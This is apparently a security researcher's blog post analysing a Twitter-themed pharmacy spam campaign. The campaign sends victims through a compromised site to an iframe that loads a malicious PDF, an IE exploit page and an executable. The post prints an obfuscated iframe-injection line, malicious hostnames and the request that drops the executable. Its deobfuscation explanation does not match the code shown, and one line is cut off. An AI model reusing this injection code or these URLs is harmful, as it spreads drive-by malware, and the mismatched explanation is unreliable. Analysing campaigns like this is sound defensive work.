At the time we posted that article we were starting to explore another aspect of the Twitter spam campaign, which continues unabated today, according to the UAB Spam Data Mine. Clicking on the link in the spam is well-publicized as a means to reaching a Canadian pharmacy website, but secretly behind the covers, this spam is all about planting malware.
Let's explore one example from an email we dissected this morning.
As with the American Express , IRS, and Twitter spam, this spam campaign avoids Spam Blacklisting methods by using many thousands of uniquely created spam URLs. In the case of the email we are examining, it looked like this:
The link that claims to be going to "twitter.com" is actually a URL for http://technoline.ca/z.htm
Technoline.ca is in all likelihood a compromised webserver, since its been up since October 2008 "serving the greater Montreal and South Shore region."
When we visit the "z.htm" page, we find that we get a 3 second meta refresh to take us to Canadian pharmacy site "toldspeak.com", however we ALSO get an iframe that takes us to:
rubytune.ru port 8080 /index.php?pid=10
(Rubytune.ru is possibly fast flux. Its currently resolving at:
Lya2m7t = '
Ekv9i7z55 = '<5i6f,r|a|m6e5 *s*r5c5=6A6p*p5l,e,t61,0,.*h,t|m,l,>,<,/5i6f*r5a6m6e6>*'.replace(/[\*56\|,]/g, '');
So, the first line is saying take the big long string, and remove the characters in the list: "/", "[", "b", "5", "|", "M", and "H".
If we do that, it leaves us with an iframe to: Notes10.pdf
Doing the same thing on the other line leaves us with an iframe: Applet10.html
Both of those pages are downloaded from the "rubytune.ru" port 8080 webserver.
Notes10.pdf is a malicious PDF, however of the 41 anti-virus products at VirusTotal, only ONE of them says so. Its MD5 is: 33a6f72d52c53c10dd3eb3a7148651f2. You can see its VirusTotal Report here.
Applet10.html is yet another puzzle. This one is a webpage that has the title "Bob's homepage" and tries to use an IE exploit to drop a couple jar files, including a 0010.jar from the (unreachable) site: 18.104.22.168, and a file called "NewGames.jar". The only part of it that I can make function right now is a call to the rubytune.ru site passing a GET of "welcome.php?id=9&pid=10&1=1".
When we do that call, it drops an .exe on the box. For simplicity I named the .exe "welcome.exe". VirusTotal does a bit better with that one. This VirusTotal report shows 7 of 41 detections.
I kicked off the "welcome.exe" in a VM, and what I can tell for sure is that it bluescreened my VM. More details later . . .